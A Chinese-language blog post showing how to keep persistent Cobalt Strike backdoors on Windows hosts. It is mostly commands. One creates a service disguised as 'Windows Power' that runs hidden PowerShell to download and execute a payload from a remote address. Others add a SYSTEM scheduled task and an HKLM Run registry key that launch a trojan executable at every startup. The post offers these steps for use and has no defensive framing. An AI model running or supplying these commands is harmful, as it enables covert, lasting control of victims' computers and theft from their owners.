【远控使用】Cobalt Strike可持续后门的使用

前言

  • Cobalt Strike的基础使用

一、服务器自启动配置

1、创建服务

1
shell sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.43.22:80/a'))\""

2、设置服务会自动启动

1
2
3
4
shell sc config "Windows Power" start= auto
shell sc description "Windows Power" "Windows auto service" #描述
shell sc start "Windows Power" #来启动
shell net start Windows Power

会被防火墙拦截,也可以换个木马执行

image-20210917162510909

二、计划任务

1、创建任务

1
shell schtasks /create /tn "windowsup" /tr "C:\artifact.exe" /ru SYSTEM /sc onstart

2、修改字符集和查询

1
2
chcp 437 
shell schtasks /query /tn windowsup

3、启动

1
shell schtasks /run /tn windowsup

image-20210917164534933

image-20210917165216574

4、删除计划

1
shell schtasks /delete /tn windowsup

三、注册表启动

系统启动时,就会执行木马

1
shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\artifact.exe" /f

image-20210917170307071

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【远控使用】Cobalt Strike可持续后门的使用

文章作者:孤桜懶契

发布时间:2021年09月17日 - 16:06:44

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/143.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------